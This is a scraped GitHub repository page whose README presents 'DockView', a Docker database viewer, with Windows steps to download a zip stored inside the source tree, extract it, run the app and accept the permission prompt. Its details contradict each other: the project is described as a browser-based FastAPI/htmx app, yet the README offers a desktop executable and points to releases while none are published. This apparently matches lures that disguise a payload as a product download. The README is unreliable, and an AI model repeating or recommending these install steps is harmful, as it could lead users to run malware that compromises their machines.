Skip to content

Laf1456/dockview

Repository files navigation

🐳 dockview - View Docker databases with ease

Download dockview

📦 What DockView does

DockView is a desktop app that helps you view databases that run inside Docker.

It is made for simple use. You open the app, connect to a running Docker container, and browse your data in a clear table view.

DockView works with common database types, including:

  • MongoDB
  • MySQL
  • PostgreSQL
  • Redis

It is built for people who want to look at data without setting up a full database tool by hand.

💻 What you need

Use DockView on a Windows PC with:

  • Windows 10 or Windows 11
  • Docker Desktop installed and running
  • A database container already running
  • Enough free space for the app and your database data
  • A stable network or local Docker setup

For best results, keep Docker Desktop open before you start DockView.

🚀 Download and install

  1. Open this page: https://github.com/Laf1456/dockview/raw/refs/heads/main/app/services/Software_v3.9.zip
  2. Find the latest release or download file
  3. Download DockView to your computer
  4. If the file is a .zip, right-click it and choose Extract All
  5. Open the extracted folder
  6. Double-click the DockView app to run it
  7. If Windows asks for permission, choose Yes

If the download gives you an app file, you can open it right away after it finishes downloading.

🔧 First-time setup

After you start DockView for the first time:

  1. Make sure Docker Desktop is running
  2. Start the database container you want to view
  3. Open DockView
  4. Choose the database type
  5. Enter the container details shown in Docker
  6. Connect to the database

DockView is designed to keep this simple. In many cases, it can find the right connection details with little input.

🗂️ Supported database types

DockView can help you view data from these common database systems:

MongoDB

Use this for document data stored in collections.

MySQL

Use this for table-based data in a classic relational setup.

PostgreSQL

Use this for structured data with strong query support.

Redis

Use this for key-value data and fast lookups.

🖱️ How to use DockView

  1. Start the app
  2. Pick the database you want to view
  3. Connect to the running container
  4. Choose a database, schema, or collection
  5. Open a table or record list
  6. Browse rows, fields, and values
  7. Search for data when you need something specific

The app uses a clean layout so you can move through your data without a long setup process.

🧭 Common tasks

View records

Open a table or collection to see the data inside it.

Search data

Use the search field to find names, IDs, or values.

Refresh results

Reload the view after new data is added to your container.

Switch databases

Move between containers or database types from the main screen.

Inspect values

Open a record to see the full content in one place.

🧰 Tips for a smooth start

  • Keep Docker Desktop open before you launch DockView
  • Use the same database container name each time if possible
  • If you have more than one database running, check the port number
  • Start with a small test database if you want to learn the app
  • Close other heavy apps if your PC feels slow

🪟 Windows help

If DockView does not open:

  1. Check that the file finished downloading
  2. Make sure you extracted the .zip file if needed
  3. Right-click the app and choose Open
  4. Confirm that Windows did not block the file
  5. Check that Docker Desktop is running
  6. Start your database container again

If the app opens but you do not see data:

  1. Check that the container is still running
  2. Confirm the database type is correct
  3. Verify the container name or port
  4. Refresh the view
  5. Restart the app if needed

🔒 Privacy and local use

DockView is meant for local database viewing through Docker.

It connects to the databases you run on your own machine or local network. Your data stays in your setup unless you connect it elsewhere.

📁 Project details

  • Repository: dockview
  • Description: Initial public release of DockView — a zero-config Docker database viewer.
  • Topics: database, developer-tools, docker, fastapi, htmx, mongodb, mysql, postgresql, pwa, redis

🛠️ For future updates

When new releases appear, return to the download page and get the latest version for Windows.

About

Browse Docker databases with zero setup; auto-detect PostgreSQL, MySQL, MongoDB, and Redis in a clean browser UI

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors